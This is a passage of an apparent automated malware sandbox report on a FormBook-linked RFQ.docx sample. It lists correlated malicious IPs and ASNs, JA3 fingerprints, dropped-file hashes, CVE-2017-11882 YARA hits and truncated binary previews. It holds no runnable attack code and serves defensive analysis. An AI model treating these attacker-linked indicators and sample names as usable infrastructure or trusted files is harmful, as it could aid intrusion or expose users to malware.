                                                                                  • 45.33.6.223
                                                                                  IND24072113.xlsxGet hashmaliciousUnknownBrowse
                                                                                  • 45.33.6.223
                                                                                  ekte.exeGet hashmaliciousFormBookBrowse
                                                                                  • 45.33.6.223
                                                                                  IND24072113_1.xlsxGet hashmaliciousUnknownBrowse
                                                                                  • 45.33.6.223

                                                                                  ASNs

                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                  MULTIBAND-NEWHOPEUSAWB_NO_907853880911.exeGet hashmaliciousFormBookBrowse
                                                                                  • 209.74.64.58
                                                                                  RFQ.exeGet hashmaliciousFormBookBrowse
                                                                                  • 209.74.64.58
                                                                                  3NvALxFlHV.exeGet hashmaliciousFormBookBrowse
                                                                                  • 209.74.64.189
                                                                                  2ULrUoVwTx.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                  • 209.74.64.189
                                                                                  XhAQ0Rk63O.exeGet hashmaliciousFormBookBrowse
                                                                                  • 209.74.64.58
                                                                                  PO_11000262.vbsGet hashmaliciousFormBookBrowse
                                                                                  • 209.74.95.29
                                                                                  UNGSno5k4G.exeGet hashmaliciousFormBookBrowse
                                                                                  • 209.74.95.29
                                                                                  r6lOHDg9N9.exeGet hashmaliciousFormBookBrowse
                                                                                  • 209.74.95.29
                                                                                  09Iz0ja549.exeGet hashmaliciousFormBookBrowse
                                                                                  • 209.74.64.190
                                                                                  En88bvC0fc.exeGet hashmaliciousFormBookBrowse
                                                                                  • 209.74.64.187
                                                                                  TANDEMUShttps://ascerta.aha.io/shared/edaa0f8ea0ea06d13e545667a40fae36Get hashmaliciousUnknownBrowse
                                                                                  • 15.197.193.217
                                                                                  4GsYBMtqCN.msiGet hashmaliciousUnknownBrowse
                                                                                  • 15.197.137.111
                                                                                  Mdgbxdb9ho.msiGet hashmaliciousUnknownBrowse
                                                                                  • 15.197.137.111
                                                                                  https://6n95d.outouncip.com/ZXvIWsw/Get hashmaliciousUnknownBrowse
                                                                                  • 15.197.193.217
                                                                                  xxTupY4Fr3.xlsxGet hashmaliciousUnknownBrowse
                                                                                  • 15.197.148.33
                                                                                  SHIPPING DOC_20241107.exeGet hashmaliciousFormBookBrowse
                                                                                  • 15.197.148.33
                                                                                  9JvpARJbsQ.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                  • 128.88.171.229
                                                                                  nuklear.arm.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                  • 16.252.73.197
                                                                                  https://www.usatraveldocs.com/inGet hashmaliciousUnknownBrowse
                                                                                  • 15.197.204.56
                                                                                  Remittance_Ref;-49743170932be73dd68e9130949b1b5dbf8aa216bc0f0729cd.htmlGet hashmaliciousUnknownBrowse
                                                                                  • 15.197.193.217
                                                                                  SAKURA-BSAKURAInternetIncJPnuklear.arm.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                  • 163.43.146.137
                                                                                  RFQ.docxGet hashmaliciousFormBookBrowse
                                                                                  • 153.121.40.91
                                                                                  la.bot.mips.elfGet hashmaliciousUnknownBrowse
                                                                                  • 61.211.231.140
                                                                                  splarm7.elfGet hashmaliciousUnknownBrowse
                                                                                  • 59.106.31.141
                                                                                  yGktPvplJn.exeGet hashmaliciousPushdoBrowse
                                                                                  • 59.106.19.204
                                                                                  la.bot.sh4.elfGet hashmaliciousUnknownBrowse
                                                                                  • 59.106.95.91
                                                                                  la.bot.powerpc.elfGet hashmaliciousUnknownBrowse
                                                                                  • 59.106.78.139
                                                                                  la.bot.sh4.elfGet hashmaliciousUnknownBrowse
                                                                                  • 160.18.44.37
                                                                                  botnet.m68k.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                  • 153.121.66.119
                                                                                  la.bot.arm.elfGet hashmaliciousUnknownBrowse
                                                                                  • 160.18.19.43
                                                                                  LINODE-APLinodeLLCUSY7isAhMKal.exeGet hashmaliciousFormBookBrowse
                                                                                  • 45.79.252.94
                                                                                  SHIPPING DOC_20241107.exeGet hashmaliciousFormBookBrowse
                                                                                  • 45.33.6.223
                                                                                  https://majorbrdide.comGet hashmaliciousUnknownBrowse
                                                                                  • 173.255.204.62
                                                                                  DHL_doc.exeGet hashmaliciousFormBookBrowse
                                                                                  • 45.79.252.94
                                                                                  sDX1AXN1Zp.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                  • 212.71.245.12
                                                                                  https://www.usatraveldocs.com/inGet hashmaliciousUnknownBrowse
                                                                                  • 45.33.30.197
                                                                                  update.htaGet hashmaliciousCobalt Strike, SliverBrowse
                                                                                  • 23.239.28.166
                                                                                  SecuriteInfo.com.FileRepMalware.20173.21714.exeGet hashmaliciousFormBookBrowse
                                                                                  • 178.79.184.196
                                                                                  5WP9WCM8qV.exeGet hashmaliciousGuLoaderBrowse
                                                                                  • 45.33.20.235
                                                                                  5WP9WCM8qV.exeGet hashmaliciousGuLoaderBrowse
                                                                                  • 45.33.18.44

                                                                                  JA3 Fingerprints

                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                  36f7277af969a6947a61ae0b815907a1Shipment_details.xlsGet hashmaliciousRemcos, HTMLPhisherBrowse
                                                                                  • 153.121.40.91
                                                                                  Ordine R04-T4077 TBA-2024.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                  • 153.121.40.91
                                                                                  ZF3dxapdNLa4lNL.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                  • 153.121.40.91
                                                                                  xBA TM06-Q6-11-24.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                  • 153.121.40.91
                                                                                  RFQ.docxGet hashmaliciousFormBookBrowse
                                                                                  • 153.121.40.91
                                                                                  SWIFT COPY 2.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                  • 153.121.40.91
                                                                                  Y2EM7suNV5.exeGet hashmaliciousMassLogger RATBrowse
                                                                                  • 153.121.40.91
                                                                                  na.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                  • 153.121.40.91
                                                                                  na.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                  • 153.121.40.91
                                                                                  na.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                  • 153.121.40.91

                                                                                  Dropped Files

                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                  C:\Users\user\AppData\Local\Temp\wcC8DC.tmpRFQ.docxGet hashmaliciousFormBookBrowse
                                                                                    C:\Users\user\AppData\Local\Temp\sqlite3.dllSecuriteInfo.com.Exploit.CVE-2017-11882.123.29807.9267.rtfGet hashmaliciousFormBookBrowse
                                                                                      tee030.docGet hashmaliciousFormBookBrowse
                                                                                        Pepsico_LLC_Company_Profile.xlsGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                          TERMS.docGet hashmaliciousUnknownBrowse
                                                                                            specifik#U00e1ci#U00f3k.xlsGet hashmaliciousFormBookBrowse
                                                                                              dvswiftsend_202212390513_93310737712.xlsGet hashmaliciousFormBookBrowse

                                                                                                Created / dropped Files

                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\sqlite-dll-win32-x86-3250000[1].zip

                                                                                                Download File
                                                                                                Process:C:\Windows\SysWOW64\convert.exe
                                                                                                File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                Category:dropped
                                                                                                Size (bytes):476192
                                                                                                Entropy (8bit):7.998639774314973
                                                                                                Encrypted:true
                                                                                                SSDEEP:6144:lo5hufK3q6Z/u65BuGsrxvyG3pV7Ys6bHkUzQ5pztzp7eL6iUJILX2Bc:lmhurA/uewgCpV0s1U0zziUyLSc
                                                                                                MD5:92DECB824900E1FF4F222F16ED35B211
                                                                                                SHA1:86F6FEE1BE59DBEB8B058E03D4975309A10C3789
                                                                                                SHA-256:724525914CA374B3AF253A5ECAA9DC41A2F2EE58EF3A61402C6606E330711360
                                                                                                SHA-512:CB7EBAD32F19B1AEC6330CBE9B5DF4A71C106B5EF168B9762AABF42EAECDA463E45AEE9FFA4F40514B0936A09A629B87543892B151BAEDA761A9B5E01A522ED6
                                                                                                Malicious:false
                                                                                                Reputation:low
                                                                                                Preview:PK........./M....(...........sqlite3.defUT...Z..[Z..[ux.........d......r.6...y...O_ .f..z.P..."..x.~..?..Hnz..A$A......~.....KI./..w...0-F{..CM..o&|...F?.,..pN...]Z....;...!p..[..pV&.:...=y....Y.g..[@.N..89...x..O.%J..L..o.3x8X..x...=k.~.*4'|.5...n..4.<8..e.pdN.X.kK......(..t.zU...zy........g...;.zQ l.&.....I..U`.....4...S.y.....xg....y@.../f.6...)..WX.......+x..*{.x..82ql..r...D...+.f..&.a.'......~...F.)..z.....Mp,..S...0..&w*F..u..R5.x.L..}...7*..Y.......~..f..a......+&...&.oR...........).........H..I.^s]3Z.8....w.a,.8/|.Y..MX.#.....1`.......5_..].....H....ke..X.p......JK"5....N.+,.........)d.Q.j..g.c.........~....``.Y..Y(4o1....{...H._..z...../.........R.y....5WY.....^....L.U...I.(S...J...I...:......_..v"E.J.qZ..VeG]..gj.H.X...{..aZ......:.T...#.$..H.qh.JE..@IN...i.[8her....|i..9...IDel..%..94.*....L..I.....,I.:.....!...h.^...g....R<.*.4..u.*o.L>.EG{..z..$PX........Y.BX..L...__{.6#@..o)....N... .]..>.......i..5._.F..K...>....G....K....

                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{AAAEB295-BE41-468F-A84A-4A342AF27793}.tmp

                                                                                                Download File
                                                                                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                Category:dropped
                                                                                                Size (bytes):1543680
                                                                                                Entropy (8bit):5.9690606085869575
                                                                                                Encrypted:false
                                                                                                SSDEEP:24576:0lZq+BNob45fY+5/mdD0uMlZq+BNob45fY+5/mdD0:hb45f15/mtb45f15/m
                                                                                                MD5:71F110A39A6F631C4375541727008496
                                                                                                SHA1:B04C7BE7E40FC9813C49B197A3A9E5FDCDD1E2F9
                                                                                                SHA-256:113DF645BB3BA18C3A8993E01135ECA0C717EDBED7E133ED04C273ECFA068D82
                                                                                                SHA-512:1A406ABB9FF52D99FF9A0490D2949D7422A96B974B3759C69190E2FD1586466DD06C1760AC4127E12729FD65290FFDFB1BFDF3FC24DB74053EB2F9CB4A85A4CB
                                                                                                Malicious:true
                                                                                                Yara Hits:
                                                                                                • Rule: EXP_potential_CVE_2017_11882, Description: unknown, Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{AAAEB295-BE41-468F-A84A-4A342AF27793}.tmp, Author: ReversingLabs
                                                                                                Antivirus:
                                                                                                • Antivirus: Avira, Detection: 100%
                                                                                                Preview:......................>................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................... ...!..."...#...$...%...&...'...(...)...*...+...,...-......./...0...1...2...3...4...5...6...7...8...9...:...;...<...=...>...?...@...A...B...C...D...E...F...G...H...I...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...

                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{812C73BD-3A07-485D-97A0-2CE674AA594B}.tmp

                                                                                                Download File
                                                                                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1024
                                                                                                Entropy (8bit):1.852408474638061
                                                                                                Encrypted:false
                                                                                                SSDEEP:12:D5DxaWwAwNSeOc1MClXiOk5uFJLHHxI3HPkmWl:D+WwAQSU1MClXY50RYMmWl
                                                                                                MD5:E5D28125EB529C34D56D5B3DCD1D1D34
                                                                                                SHA1:2A78C522269EBC96AAF06E9AB2E2D4E9FE1C05D8
                                                                                                SHA-256:33DC3455DA9A2891E5E13476D61E144EFA7E8E26BB6A4EDD72519A25292DB953
                                                                                                SHA-512:EE85DB096A605E30C4B568F76FC9AF0C2DECC7F2BD34838BA62083FE026FB02281E905DD2ED257822B7274AD3C70A54C066F2D980DF1653F94A399A94EF38876
                                                                                                Malicious:false
                                                                                                Preview:S.e.a.n. .M.o.r.t.o.n.S.e.a.n. .M.o.r.t.o.n.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.o.f.f.i.c.e./.w.o.r.d./.2.0.0.3./.w.o.r.d.m.l.2.4.5.0.......).(.).(.).(.).(.).(.).5.=....... .P.a.c.k.a.g.e.E.M.B.E.D.5.=....... .E.q.u.a.t.i.o.n...3.E.M.B.E.D.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................h`H[.CJ.....j.....h`H[.CJ..U....h`H[.<..CJ....

                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{A7159C52-01E7-49D6-A6F5-056C54B00F1D}.tmp

                                                                                                Download File
                                                                                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1024
                                                                                                Entropy (8bit):0.05390218305374581
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:ol3lYdn:4Wn
                                                                                                MD5:5D4D94EE7E06BBB0AF9584119797B23A
                                                                                                SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
                                                                                                SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
                                                                                                SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
                                                                                                Malicious:false
                                                                                                Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{AC6CA823-E116-4D41-887B-65794B94B181}.tmp

                                                                                                Download File
                                                                                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1024
                                                                                                Entropy (8bit):0.05390218305374581
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:ol3lYdn:4Wn
                                                                                                MD5:5D4D94EE7E06BBB0AF9584119797B23A
                                                                                                SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
                                                                                                SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
                                                                                                SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
                                                                                                Malicious:false
                                                                                                Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                C:\Users\user\AppData\Local\Temp\1xhx8.zip

                                                                                                Download File
                                                                                                Process:C:\Windows\SysWOW64\convert.exe
                                                                                                File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                Category:dropped
                                                                                                Size (bytes):476192
                                                                                                Entropy (8bit):7.998639774314973
                                                                                                Encrypted:true
                                                                                                SSDEEP:6144:lo5hufK3q6Z/u65BuGsrxvyG3pV7Ys6bHkUzQ5pztzp7eL6iUJILX2Bc:lmhurA/uewgCpV0s1U0zziUyLSc
                                                                                                MD5:92DECB824900E1FF4F222F16ED35B211
                                                                                                SHA1:86F6FEE1BE59DBEB8B058E03D4975309A10C3789
                                                                                                SHA-256:724525914CA374B3AF253A5ECAA9DC41A2F2EE58EF3A61402C6606E330711360
                                                                                                SHA-512:CB7EBAD32F19B1AEC6330CBE9B5DF4A71C106B5EF168B9762AABF42EAECDA463E45AEE9FFA4F40514B0936A09A629B87543892B151BAEDA761A9B5E01A522ED6
                                                                                                Malicious:false
                                                                                                Preview:PK........./M....(...........sqlite3.defUT...Z..[Z..[ux.........d......r.6...y...O_ .f..z.P..."..x.~..?..Hnz..A$A......~.....KI./..w...0-F{..CM..o&|...F?.,..pN...]Z....;...!p..[..pV&.:...=y....Y.g..[@.N..89...x..O.%J..L..o.3x8X..x...=k.~.*4'|.5...n..4.<8..e.pdN.X.kK......(..t.zU...zy........g...;.zQ l.&.....I..U`.....4...S.y.....xg....y@.../f.6...)..WX.......+x..*{.x..82ql..r...D...+.f..&.a.'......~...F.)..z.....Mp,..S...0..&w*F..u..R5.x.L..}...7*..Y.......~..f..a......+&...&.oR...........).........H..I.^s]3Z.8....w.a,.8/|.Y..MX.#.....1`.......5_..].....H....ke..X.p......JK"5....N.+,.........)d.Q.j..g.c.........~....``.Y..Y(4o1....{...H._..z...../.........R.y....5WY.....^....L.U...I.(S...J...I...:......_..v"E.J.qZ..VeG]..gj.H.X...{..aZ......:.T...#.$..H.qh.JE..@IN...i.[8her....|i..9...IDel..%..94.*....L..I.....,I.:.....!...h.^...g....R<.*.4..u.*o.L>.EG{..z..$PX........Y.BX..L...__{.6#@..o)....N... .]..>.......i..5._.F..K...>....G....K....

                                                                                                C:\Users\user\AppData\Local\Temp\2-4C93H

                                                                                                Download File
                                                                                                Process:C:\Windows\SysWOW64\convert.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3032001, page size 2048, file counter 10, database pages 37, cookie 0x2f, schema 4, UTF-8, version-valid-for 10
                                                                                                Category:dropped
                                                                                                Size (bytes):77824
                                                                                                Entropy (8bit):1.133993246026424
                                                                                                Encrypted:false
                                                                                                SSDEEP:96:LSGKaEdUDHN3ZMesTyWTJe7uKfeWb3d738Hsa/NlSGIdEd01YLvqAogv5KzzUG+S:uG8mZMDTJQb3OCaM0f6kL1Vumi
                                                                                                MD5:8BB4851AE9495C7F93B4D8A6566E64DB
                                                                                                SHA1:B16C29E9DBBC1E1FE5279D593811E9E317D26AF7
                                                                                                SHA-256:143AD87B1104F156950A14481112E79682AAD645687DF5E8C9232F4B2786D790
                                                                                                SHA-512:DDFD8A6243C2FC5EE7DAE2EAE8D6EA9A51268382730FA3D409A86165AB41386B0E13E4C2F2AC5556C9748E4A160D19B480D7B0EA23BA0671F921CB9E07637149
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ .......%.........../......................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                C:\Users\user\AppData\Local\Temp\sqlite3.def

                                                                                                Download File
                                                                                                Process:C:\Windows\SysWOW64\convert.exe
                                                                                                File Type:ASCII text
                                                                                                Category:dropped
                                                                                                Size (bytes):5537
                                                                                                Entropy (8bit):4.352267516149359
                                                                                                Encrypted:false
                                                                                                SSDEEP:96:GcuN/gR+7Ogn0XRMcGM3KOGOF++BwIMtvrENw+Y0aR:E/Q+7Ogn0RKOBF+++HvrENw+cR
                                                                                                MD5:E8FDCAF1419C66D9916AD24D2FD671EE
                                                                                                SHA1:E82EFDBB5561810E9EBBF80185642821F1B9D17E
                                                                                                SHA-256:CB18BFE294499FEA8EE847148DD497DD20A05B3181E6B6AE8651B24B3D29391B
                                                                                                SHA-512:B66EC534893F19152945BE4F717C2BD0542D88F43C57398CA5B61C74978A8FBB38A8E7144D104E5B254B50E1BCC9F158CA183A1D472708DA1A4AA356DEA9569F
                                                                                                Malicious:false
                                                                                                Preview:EXPORTS.sqlite3_aggregate_context.sqlite3_aggregate_count.sqlite3_auto_extension.sqlite3_backup_finish.sqlite3_backup_init.sqlite3_backup_pagecount.sqlite3_backup_remaining.sqlite3_backup_step.sqlite3_bind_blob.sqlite3_bind_blob64.sqlite3_bind_double.sqlite3_bind_int.sqlite3_bind_int64.sqlite3_bind_null.sqlite3_bind_parameter_count.sqlite3_bind_parameter_index.sqlite3_bind_parameter_name.sqlite3_bind_pointer.sqlite3_bind_text.sqlite3_bind_text16.sqlite3_bind_text64.sqlite3_bind_value.sqlite3_bind_zeroblob.sqlite3_bind_zeroblob64.sqlite3_blob_bytes.sqlite3_blob_close.sqlite3_blob_open.sqlite3_blob_read.sqlite3_blob_reopen.sqlite3_blob_write.sqlite3_busy_handler.sqlite3_busy_timeout.sqlite3_cancel_auto_extension.sqlite3_changes.sqlite3_clear_bindings.sqlite3_close.sqlite3_close_v2.sqlite3_collation_needed.sqlite3_collation_needed16.sqlite3_column_blob.sqlite3_column_bytes.sqlite3_column_bytes16.sqlite3_column_count.sqlite3_column_database_name.sqlite3_column_database_name16.sqlite3_colum

                                                                                                C:\Users\user\AppData\Local\Temp\sqlite3.dll

                                                                                                Download File
                                                                                                Process:C:\Windows\SysWOW64\convert.exe
                                                                                                File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):909692
                                                                                                Entropy (8bit):6.507975732370588
                                                                                                Encrypted:false
                                                                                                SSDEEP:24576:Gk99/oB1gHyv1DmZIVHas0Sy4bfR/oVAZzv/Zg:G2KDBmZS6v54zR/2AA
                                                                                                MD5:9C73B282279E74E40435132E61FDA001
                                                                                                SHA1:63C7248E91B68FBDE4641E3C5E2DC3E9D38671FA
                                                                                                SHA-256:6710D91D77E1937DD5B46D96C0852042985DC78C4C51CE12D3E07A4CDB12C202
                                                                                                SHA-512:02F9A01A3A5F74EF994EBB9E5F24C6870E2D48C8B99C429A63E74DAD73FB581F0B52B2A86D651CAFA414675B70A0E85B2E08C843D07E080FE69EE835E3C91108
                                                                                                Malicious:true
                                                                                                Antivirus:
                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                Joe Sandbox View:
                                                                                                • Filename: SecuriteInfo.com.Exploit.CVE-2017-11882.123.29807.9267.rtf, Detection: malicious, Browse
                                                                                                • Filename: tee030.doc, Detection: malicious, Browse
                                                                                                • Filename: Pepsico_LLC_Company_Profile.xls, Detection: malicious, Browse
                                                                                                • Filename: TERMS.doc, Detection: malicious, Browse
                                                                                                • Filename: specifik#U00e1ci#U00f3k.xls, Detection: malicious, Browse
                                                                                                • Filename: dvswiftsend_202212390513_93310737712.xls, Detection: malicious, Browse
                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...Z..[...........!.....D...................`.....a................................$K........ .........................w ......0............................ ...3...................................................................................text....C.......D..................`.P`.data........`.......J..............@.`..rdata...............f..............@.`@.bss....(.............................`..edata..w ......."..................@.0@.idata..0...........................@.0..CRT....,...........................@.0..tls.... ...........................@.0..rsrc...............................@.0..reloc...3... ...4..................@.0B/4...........`......................@.@B/19.........p......................@..B/31.................................@..B/45..........0......................@..B/57..........P......................@.0B/70.....i....`..........

                                                                                                C:\Users\user\AppData\Local\Temp\wcC8DC.tmp

                                                                                                Download File
                                                                                                Process:C:\Windows\System32\rundll32.exe
                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):287232
                                                                                                Entropy (8bit):7.962781797413623
                                                                                                Encrypted:false
                                                                                                SSDEEP:6144:M83qPnS1afDKGE1okIzkqBTLTJa4w5ol25xEGt3sm/+WPf:bq/Z7E1FIz7TLlaYEnWaf
                                                                                                MD5:171A226B8F8742B78EFD214FCA348A95
                                                                                                SHA1:2408FFDD08CF4F4815F37CC07DCF1034658CEC42
                                                                                                SHA-256:22F72938B6ADEF7A0832E2856AD1F72A1C4400D0CE0DD9AECF87F68118FFE921
                                                                                                SHA-512:48457427B58C79DC3E5E0BC2A5F2C57EE2D05B359CA334D7C19AE6DB1C673ABB185136607334BBD37B41868E8D4D81B1EEE6DB54A33307035F7C86068F2266A0
                                                                                                Malicious:true
                                                                                                Antivirus:
                                                                                                • Antivirus: Avira, Detection: 100%
                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                • Antivirus: ReversingLabs, Detection: 68%
                                                                                                Joe Sandbox View:
                                                                                                • Filename: RFQ.docx, Detection: malicious, Browse
                                                                                                Preview:MZER.....X......<......(..............................................!..L.!This program cannot be run in DOS mode....$.......y...=`g.=`g.=`g.....:`g.....<`g.....<`g.Rich=`g.........PE..L....qjZ.................P..........`........`....@..........................`............@..........................................................................................................................................................text...TN.......P.................. ..`................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                C:\Users\user\AppData\Local\Temp\xwizard

                                                                                                Download File
                                                                                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                File Type:MS-DOS executable PE32+ executable (DLL) x86-64, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):761224
                                                                                                Entropy (8bit):5.990830941125295
                                                                                                Encrypted:false
                                                                                                SSDEEP:12288:3lZC3+B9cbeLWDTmxbeZb4CBWjXfY7qhucH+fOkEXRTrC6/mdD0oe:3lZq+BNob45fY+5/mdD01
                                                                                                MD5:C9A17713561A92CDB5168369FA36FA63
                                                                                                SHA1:B4A41BB9D9E1935E17EE95952EE9D59C405E1D3B
                                                                                                SHA-256:4EEA3450229FA5FE811A166317986F82E2BA0C24A0C73197A94A238466B96631
                                                                                                SHA-512:CEE89969D0DEF5D0328D11FEFB6742FDF61220700C5AE4454F4C928E72CE953AF957F161DAF4FBC79BB83A09B49AB5AC3BE2FEE293E6B0EEC4BB11958481A8A4
                                                                                                Malicious:true
                                                                                                Antivirus:
                                                                                                • Antivirus: ReversingLabs, Detection: 24%
                                                                                                Preview:MZ..........................................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d.................B ................................................................................................................................. ...............z...#...........................................................................................text....].......^.................. ..`.data........p.......b..............@....rsrc...(q... ...r..................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                C:\Users\user\AppData\Local\Temp\xwizard:Zone.Identifier

                                                                                                Download File
                                                                                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):26
                                                                                                Entropy (8bit):3.95006375643621
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:gAWY3n:qY3n
                                                                                                MD5:FBCCF14D504B7B2DBCB5A5BDA75BD93B
                                                                                                SHA1:D59FC84CDD5217C6CF74785703655F78DA6B582B
                                                                                                SHA-256:EACD09517CE90D34BA562171D15AC40D302F0E691B439F91BE1B6406E25F5913
                                                                                                SHA-512:AA1D2B1EA3C9DE3CCADB319D4E3E3276A2F27DD1A5244FE72DE2B6F94083DDDC762480482C5C2E53F803CD9E3973DDEFC68966F974E124307B5043E654443B98
                                                                                                Malicious:false
                                                                                                Preview:[ZoneTransfer]..ZoneId=3..

                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\RFQ.LNK

                                                                                                Download File
                                                                                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Fri Aug 11 15:42:13 2023, mtime=Fri Aug 11 15:42:13 2023, atime=Mon Nov 11 08:03:15 2024, length=312052, window=hide
                                                                                                Category:dropped
                                                                                                Size (bytes):980
                                                                                                Entropy (8bit):4.53543744036755
                                                                                                Encrypted:false
                                                                                                SSDEEP:12:8DB1gXg/XAlCPCHaXfBOB/Pr+X+WAUAosrNQicvbLuNDtZ3YilMMEpxRljK1TdIp:8Dl/XTPMs7FAeyDv3qM57u
                                                                                                MD5:072665DE5EBC784CB44647EC39D749D6
                                                                                                SHA1:AEEC5AA86207066065D3CFAD9098F6EA31E34227
                                                                                                SHA-256:80556BA2FE47ABC89D2E2D02973DF33A9B37D3883CEC0764607D5267826CCA72
                                                                                                SHA-512:FFCD779002B6019B6B116C784EBCD33373FAB69D3AF981CB46BB42E920E0E8CB0127DE74441E61072C5DA4131C62E098FEECEF1E1A3A43E380C69B3FD2860AFA
                                                                                                Malicious:false
                                                                                                Preview:L..................F.... ....V..r....V..r...J...4...............................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1.....kYeH..user.8......QK.XkYeH*...&=....U...............A.l.b.u.s.....z.1......WH...Desktop.d......QK.X.WH.*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....V.2.....kYhH .RFQ~1.DOC.>.......WG..WG.*.........................R.F.Q...d.o.c.x.......r...............-...8...[............?J......C:\Users\..#...................\\436432\Users.user\Desktop\RFQ.docx.......\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.R.F.Q...d.o.c.x.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......436432..........D_....3N...W...9..W.e8...8.....[D_....3N...W...9..W.e8...8.....[....

                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat

                                                                                                Download File
                                                                                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                File Type:Generic INItialization configuration [folders]
                                                                                                Category:dropped
                                                                                                Size (bytes):41
                                                                                                Entropy (8bit):4.381942248520523
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:H8jyp6YVom4+p6YVov:HAYVCYVy
                                                                                                MD5:411ECB5A78A7A35A32DFACF8658CE5ED
